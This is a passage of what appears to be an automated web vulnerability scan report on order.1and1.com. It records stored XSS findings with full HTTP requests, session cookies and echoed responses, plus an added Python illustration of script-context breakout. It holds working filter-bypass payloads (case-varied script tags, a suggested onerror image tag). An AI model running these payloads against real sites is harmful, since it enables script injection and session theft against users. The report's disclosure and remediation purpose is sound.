Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/DomaininfoMoved1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:26 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:38:33 GMT; Path=/
ETag: c7593eca9d95d112a774e3b42a8bf63f
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24356


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="DomaininfoMove";UNOUNO.params.lastpage="DomaininfoMoved1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.3. http://order.1and1.com/xml/order/Eshops [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Eshops is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Eshops. The payload f145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5 was submitted in the REST URL parameter 3. This input was returned as f145e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>222daa67bf5 in a subsequent request for the URL /xml/order/Eshops.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Eshopsf145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:34:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:48:28 GMT; Path=/
ETag: 425493d0f8ed0f19e7a04c07ddd3cc38
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64275


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
F99CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Eshops";UNOUNO.params.lastpage="Eshopsf145e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>222daa67bf5";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.4. http://order.1and1.com/xml/order/FeatureDatabaseDatabase [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseDatabase

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureDatabaseDatabase is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureDatabaseDatabase. The payload 9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0 was submitted in the REST URL parameter 3. This input was returned as 9ead5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>428693372d0 in a subsequent request for the URL /xml/order/FeatureDatabaseDatabase.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureDatabaseDatabase9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:40:53 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=LcWY2OTowWVlZU2ZcYylhWygaO3RnYTlQQz0lKSYmJSMlIyAgIyIcHyMtLy4tKk89aV5gbiYoI1MsVmUrHh8bGjYyMDMxKzMqKTJqazEmLV1mLB8gHBsgNDE0LzIzLC0=; Expires=Fri, 07-Apr-2079 21:55:00 GMT; Path=/
ETag: 53f791f92af4dbedadc8055ee2452240
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17973


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureDatabaseDatabase";UNOUNO.params.lastpage="FeatureDatabaseDatabase9ead5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>428693372d0";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.5. http://order.1and1.com/xml/order/FeatureEmailEmail [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailEmail

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailEmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailEmail. The payload f6a45</ScRiPt%20>ca9d9974f55 was submitted in the REST URL parameter 3. This input was returned as f6a45</ScRiPt >ca9d9974f55 in a subsequent request for the URL /xml/order/FeatureEmailEmail.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
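Added example (an editor's illustration, not part of the original scan output and not 1&1's code) for the manual examination suggested above. It is a reduced model of the HTML tokenizer states involved, run over a response fragment reconstructed from the Response 2 excerpts in this report; the opening <script> tag, which the report snips, is assumed. It labels each character of the echoed value as script data, tag or ordinary HTML data, and so shows why the partial payload of 1.5 ends in HTML data context, why the full payload of 1.2 yields a fresh script element containing alert(1), and why the event-handler payload of 1.8 and 1.9 injects an <img> element instead. Note also that the value submitted in Request 1 is echoed in Request 2 through the server-side lastpage state rather than in the same response, which is what makes these findings stored rather than reflected.

```python
import re

# Added illustration for this report (not 1&1's code): a reduced model of the
# HTML tokenizer's 'data', 'tag' and 'script data' states, used to read off the
# context each character of a reflected payload lands in. Script data ends only
# at '</script' followed by whitespace, '/' or '>', matched ASCII-case-
# insensitively, no matter what the surrounding JavaScript looks like. The
# '<!-- -->' escaped/double-escaped sub-states are deliberately left out.

SCRIPT_START = re.compile(r"<script[\s/>]", re.IGNORECASE)
SCRIPT_END = re.compile(r"</script[\s/>]", re.IGNORECASE)
TAG_NAME = re.compile(r"<(/?[A-Za-z][A-Za-z0-9]*)")

# Payloads as reflected in findings 1.2, 1.5 and 1.8 (URL-decoded).
FULL_PAYLOAD = 'd1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437'
PARTIAL_PAYLOAD = 'f6a45</ScRiPt >ca9d9974f55'
HANDLER_PAYLOAD = '649d3</ScRiPt ><img src=a onerror=alert(1)>b5a1ad5a333'


def response_fragment(page: str, payload: str) -> str:
    """Constructed around the Response 2 excerpts in this report; the opening
    <script> tag is snipped in the report and is assumed here."""
    return ('<script type="text/javascript"><!--\n'
            f'UNOUNO.params.page="{page}";UNOUNO.params.lastpage="{page}{payload}";'
            'UNOUNO.params.articles="1|tariff-beginner-package"};\n'
            '//--></script>')


def label_states(html: str) -> list:
    """One label per character: 'data', 'tag' (inside <...>) or 'script'."""
    labels, state, i, n = [], "data", 0, len(html)
    while i < n:
        if state == "script" and not SCRIPT_END.match(html, i):
            labels.append("script")
            i += 1
            continue
        if state == "data" and html[i] != "<":
            labels.append("data")
            i += 1
            continue
        # At '<' in data state, or at '</script' in script data: consume the tag.
        close = html.find(">", i)
        close = n - 1 if close == -1 else close
        labels.extend(["tag"] * (close - i + 1))
        opened_script = state == "data" and SCRIPT_START.match(html, i) is not None
        state = "script" if opened_script else "data"
        i = close + 1
    return labels


def reflection_context(html: str, reflected: str) -> dict:
    """Where the echoed value starts and ends, which tags it injected, and which
    script data inside it belongs to a *new* script element the browser runs."""
    start = html.index(reflected)
    end = start + len(reflected)
    labels = label_states(html)
    tags = [m.group(1).lower() for m in TAG_NAME.finditer(html, start, end)
            if labels[m.start()] == "tag"]
    runs, current, left = [], "", False
    for i in range(start, end):
        if labels[i] != "script":
            left = True                      # the reflection closed the original element
            if current:
                runs.append(current)
                current = ""
        elif left:
            current += html[i]               # script data after re-entering via a new <script>
    if current:
        runs.append(current)
    return {"start": labels[start], "end": labels[end - 1],
            "left_script": left, "tags": tags, "new_script": runs}


if __name__ == "__main__":
    for page, payload in (("DomaininfoMove", FULL_PAYLOAD),
                          ("FeatureEmailEmail", PARTIAL_PAYLOAD),
                          ("FeatureMarketingCtrCitysearch", HANDLER_PAYLOAD)):
        print(page, reflection_context(response_fragment(page, payload), payload))
```

The omitted comment sub-states only change the outcome when a "<script" start tag appears inside the "<!--" region before the injected "</script", which is not the case in these responses. Once the echoed value has left script data, whatever the blacklist lets through is plain HTML, so for a "Firm" result like 1.5 the next thing worth trying by hand is an HTML-context payload of the shape used in 1.8 rather than another script tag.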

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureEmailEmailf6a45</ScRiPt%20>ca9d9974f55;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:30 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=obmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:55:37 GMT; Path=/
ETag: 242b6a1e5eeabc95b2abaab00ee5cf77
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19175


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureEmailEmail";UNOUNO.params.lastpage="FeatureEmailEmailf6a45</ScRiPt >ca9d9974f55";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.6. http://order.1and1.com/xml/order/FeatureEmailWebmail [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailWebmail

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailWebmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailWebmail. The payload 45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 was submitted in the REST URL parameter 3. This input was returned as 45663</ScRiPt ><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 in a subsequent request for the URL /xml/order/FeatureEmailWebmail.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureEmailWebmail45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:53 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ObmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:56:00 GMT; Path=/
ETag: 3a27e5470d1c0301a5f75b92d0fc9df4
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16817


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
ix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureEmailWebmail";UNOUNO.params.lastpage="FeatureEmailWebmail45663</ScRiPt ><ScRiPt>alert(1)</ScRiPt>f29e6be5a86";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.7. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureGuaranteeMoneyback

Issue detail

